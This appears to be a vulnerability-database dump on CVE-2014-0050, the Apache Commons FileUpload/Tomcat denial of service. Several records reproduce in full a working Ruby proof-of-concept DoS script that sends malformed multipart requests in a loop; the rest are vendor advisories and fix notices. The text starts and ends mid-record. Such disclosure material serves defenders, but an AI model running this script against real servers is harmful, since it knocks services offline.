#"\r\n\tputs "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = ""\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs ""\r\n\tputs "ERROR: Invalid URL was entered #{options[:url]}"\r\n\tputs ""\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs ""\r\n\t\tputs "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n\t\tputs ""\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs "Request Launched"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme=="https"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n\treq.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n\treq.body = "b"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs "Timeout - continuing DoS..."\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84935"}, {"lastseen": "2017-11-19T17:35:36", "description": "BUGTRAQ ID: 65400\r\nCVE(CAN) ID: CVE-2014-0050\r\n\r\nApache Commons 
FileUpload\u8f6f\u4ef6\u5305\u53ef\u4ee5\u5411\u5c0f\u670d\u52a1\u7a0b\u5e8f\u548cWeb\u5e94\u7528\u6dfb\u52a0\u9ad8\u6027\u80fd\u7684\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u3002Apache Tomcat\u662f\u4e00\u4e2a\u6d41\u884c\u7684\u5f00\u653e\u6e90\u7801\u7684JSP\u5e94\u7528\u670d\u52a1\u5668\u7a0b\u5e8f\u3002\r\n\r\nApache\u5171\u4eab\u6587\u4ef6\u4e0a\u4f20\u5b58\u5728\u89e3\u6790\u7578\u5f62\u7684Content-Type\u5934\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f7f\u7528\u7279\u5236\u7684\u8bf7\u6c42\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7a0b\u5e8f\u5d29\u6e83\u3002\n0\nCommons FileUpload 1.0-1.3\r\nApache Tomcat 8.0.0-RC1-8.0.1\r\nApache Tomcat 7.0.0-7.0.50\r\nApache Tomcat 6\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache\r\n-----\r\n\u5347\u7ea7\u5230Commons FileUpload 1.3.1, \u6216\u8005Tomcat 8.0.2, 7.0.51\u53ca\u66f4\u9ad8\u7248\u672c\u4fee\u590d\u6b64\u6f0f\u6d1e\uff1a\r\n\r\nhttp://commons.apache.org/", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "Apache Commons FileUpload/Apache Tomcat\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61443", "id": "SSV:61443", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. 
#\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on("-h","--help","help") do\r\n puts ""\r\n puts "#################################################################################"\r\n puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n puts "# #"\r\n puts "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n puts "# This is a Proof of Concept code that was created for the sole purpose #"\r\n puts "# of assisting system administrators in evaluating whether or not #"\r\n puts "# their applications are vulnerable to this issue. #"\r\n puts "# #"\r\n puts "# Please use responsibly. 
#"\r\n puts "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = ""\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts ""\r\n puts "ERROR: Invalid URL was entered #{options[:url]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts ""\r\n puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts "Request Launched"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme=="https"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n req.body = "b"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts "Timeout - continuing DoS..."\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61443", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:34:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "**Issue Overview:**\n\nMultipartStream.java in Apache Commons FileUpload before 1.3.1, as 
used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. \n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch \n tomcat7-7.0.47-1.38.amzn1.noarch \n tomcat7-lib-7.0.47-1.38.amzn1.noarch \n tomcat7-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-javadoc-7.0.47-1.38.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch \n \n src: \n tomcat7-7.0.47-1.38.amzn1.src \n \n \n", "edition": 4, "modified": "2014-03-24T23:36:00", "published": "2014-03-24T23:36:00", "id": "ALAS-2014-312", "href": "https://alas.aws.amazon.com/ALAS-2014-312.html", "title": "Medium: tomcat7", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:36:26", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "**Issue Overview:**\n\nIt was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. A remote attacker could use this flaw to poison a web cache, perform cross-site scripting (XSS) attacks, or obtain sensitive information from other requests. 
([CVE-2013-4286 __](<https://access.redhat.com/security/cve/CVE-2013-4286>))\n\nIt was discovered that the fix for [CVE-2012-3544 __](<https://access.redhat.com/security/cve/CVE-2012-3544>) did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default. ([CVE-2013-4322 __](<https://access.redhat.com/security/cve/CVE-2013-4322>))\n\nA denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. A remote attacker could use this flaw to create a malformed Content-Type header for a multipart request, causing JBoss Web to enter an infinite loop when processing such an incoming request. ([CVE-2014-0050 __](<https://access.redhat.com/security/cve/CVE-2014-0050>))\n\n \n**Affected Packages:** \n\n\ntomcat6\n\n \n**Issue Correction:** \nRun _yum update tomcat6_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat6-servlet-2.5-api-6.0.39-1.4.amzn1.noarch \n tomcat6-lib-6.0.39-1.4.amzn1.noarch \n tomcat6-webapps-6.0.39-1.4.amzn1.noarch \n tomcat6-admin-webapps-6.0.39-1.4.amzn1.noarch \n tomcat6-6.0.39-1.4.amzn1.noarch \n tomcat6-javadoc-6.0.39-1.4.amzn1.noarch \n tomcat6-docs-webapp-6.0.39-1.4.amzn1.noarch \n tomcat6-jsp-2.1-api-6.0.39-1.4.amzn1.noarch \n tomcat6-el-2.1-api-6.0.39-1.4.amzn1.noarch \n \n src: \n tomcat6-6.0.39-1.4.amzn1.src \n \n \n", "edition": 4, "modified": "2014-05-21T10:45:00", "published": "2014-05-21T10:45:00", "id": "ALAS-2014-344", "href": "https://alas.aws.amazon.com/ALAS-2014-344.html", "title": "Medium: tomcat6", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": 
"unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:06:10", "published": "2014-02-17T21:06:10", "id": "FEDORA:EA6192175F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: apache-commons-fileupload-1.3-5.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:07:04", "published": "2014-02-17T21:07:04", "id": "FEDORA:58AC321FC4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: apache-commons-fileupload-1.3-5.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:29:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2856-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nFebruary 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libcommons-fileupload-java\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2014-0050\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart 
request with\na crafted Content-Type, resulting in a denial-of-service condition.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2014-02-07T22:59:26", "published": "2014-02-07T22:59:26", "id": "DEBIAN:DSA-2856-1:D2DA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00026.html", "title": "[SECURITY] [DSA 2856-1] libcommons-fileupload-java security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Commons FileUpload and Apache Tomcat - Denial of Service", "edition": 1, "published": "2014-02-12T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0", "href": "", "sourceData": "#################################################################################\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\n# of assisting system administrators in evaluating whether their applications \t#\n# are vulnerable to 
this issue or not\t\t\t\t\t\t\t\t\t\t\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\n\nrequire 'net/http'\nrequire 'net/https'\nrequire 'optparse'\nrequire 'openssl'\n\n\noptions = {}\n\nopt_parser = OptionParser.new do |opt|\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\n opt.separator \"\"\n opt.separator \"Options\"\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\n options[:url] = url\n end\n\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\n options[:number_of_requests] = number_of_requests\n end\n\n opt.on(\"-h\",\"--help\",\"help\") do\n \tputs \"\"\n puts \"#################################################################################\"\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\n\tputs \"# #\"\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\n\tputs \"# their applications are vulnerable to this issue. #\"\n\tputs \"# #\"\n\tputs \"# Please use responsibly. 
#\"\n\tputs \"#################################################################################\"\n puts \"\"\n puts opt_parser\n puts \"\"\n \n\texit\n end\nend\n\nopt_parser.parse!\n\n\nuri = \"\"\nbegin\n\turi = URI.parse(options[:url])\nrescue Exception => e\n\tputs \"\"\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\n\tputs \"\"\n puts opt_parser\n exit\nend\n\nnumber_of_requests = 10;\nif(options[:number_of_requests] != nil)\n\tbegin\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\n\t\tthrow Exception.new if number_of_requests <= 0 \n\trescue Exception => e\n\t\tputs e\n\t\tputs \"\"\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\n\t\tputs \"\"\n\t puts opt_parser\n\t exit\n\tend\nend\n\n#uri = URI.parse(uri)\n\n\nputs \"\"\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\ni=10\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\nputs \"\"\n\n\nnumber_of_requests.times do \n\tbegin\n\tputs \"Request Launched\"\n\thttps = Net::HTTP.new(uri.host,uri.port)\n\thttps.use_ssl = uri.scheme==\"https\"\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\n\treq = Net::HTTP::Post.new(uri.path)\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\n\treq.body = \"b\"*4097\n\thttps.read_timeout = 1 \n\tres = https.request(req)\n\trescue Timeout::Error=>e\n\t\tputs \"Timeout - continuing DoS...\"\n\trescue Exception=>e\n\t\tputs e.inspect\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-05-29T14:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in 
the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 as\nprovided from the Red Hat Customer Portal are advised to apply this update.\nThe JBoss server process must be restarted for the update to take effect.", "modified": "2019-02-20T17:13:40", "published": "2014-03-05T23:50:05", "id": "RHSA-2014:0252", "href": "https://access.redhat.com/errata/RHSA-2014:0252", "type": "redhat", "title": "(RHSA-2014:0252) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. 
(CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat JBoss\nEnterprise Application Platform installation and deployed applications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on Red Hat\nEnterprise Linux 5 and 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:08", "published": "2014-03-05T05:00:00", "id": "RHSA-2014:0253", "href": "https://access.redhat.com/errata/RHSA-2014:0253", "type": "redhat", "title": "(RHSA-2014:0253) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:12", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4286", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "description": "Red Hat JBoss Fuse Service Works is the next-generation ESB and business\nprocess automation infrastructure. Red Hat JBoss Fuse Service Works allows\nIT to leverage existing (MoM and EAI), modern (SOA and BPM-Rules), and\nfuture (EDA and CEP) integration methodologies to dramatically improve\nbusiness process execution speed and quality.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Fuse\nService Works 6.0.0. It includes various bug fixes, which are listed in the\nREADME file included with the patch files.\n\nThe following security issues are also fixed with this release:\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. 
(CVE-2014-0003)\n\nIt was found that when JBoss Web processed a series of HTTP requests in\nwhich at least one request contained either multiple content-length\nheaders, or one content-length header with a chunked transfer-encoding\nheader, JBoss Web would incorrectly handle the request. A remote attacker\ncould use this flaw to poison a web cache, perform cross-site scripting\n(XSS) attacks, or obtain sensitive information from other requests.\n(CVE-2013-4286)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. 
(CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team.\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:14:43", "published": "2014-04-30T22:58:30", "id": "RHSA-2014:0459", "href": "https://access.redhat.com/errata/RHSA-2014:0459", "type": "redhat", "title": "(RHSA-2014:0459) Important: Red Hat JBoss Fuse Service Works 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. 
(CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 as provided from the Red Hat\nCustomer Portal are advised to apply this update. The Red Hat JBoss Web\nServer process must be restarted for the update to take effect.", "modified": "2019-02-20T17:15:07", "published": "2014-05-21T19:31:56", "id": "RHSA-2014:0527", "href": "https://access.redhat.com/errata/RHSA-2014:0527", "type": "redhat", "title": "(RHSA-2014:0527) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat7 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. 
A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nAll Tomcat users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n", "modified": "2018-06-06T20:24:30", "published": "2014-04-23T04:00:00", "id": "RHSA-2014:0429", "href": "https://access.redhat.com/errata/RHSA-2014:0429", "type": "redhat", "title": "(RHSA-2014:0429) Moderate: tomcat6 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. 
(CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 are advised to upgrade to these\nupdated tomcat7 packages, which contain backported patches to correct these\nissues. The Red Hat JBoss Web Server process must be restarted for the\nupdate to take effect.", "modified": "2018-08-09T19:46:59", "published": "2014-05-21T19:09:06", "id": "RHSA-2014:0526", "href": "https://access.redhat.com/errata/RHSA-2014:0526", "type": "redhat", "title": "(RHSA-2014:0526) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat7 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0033", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. 
It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user's session. (CVE-2014-0033)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed 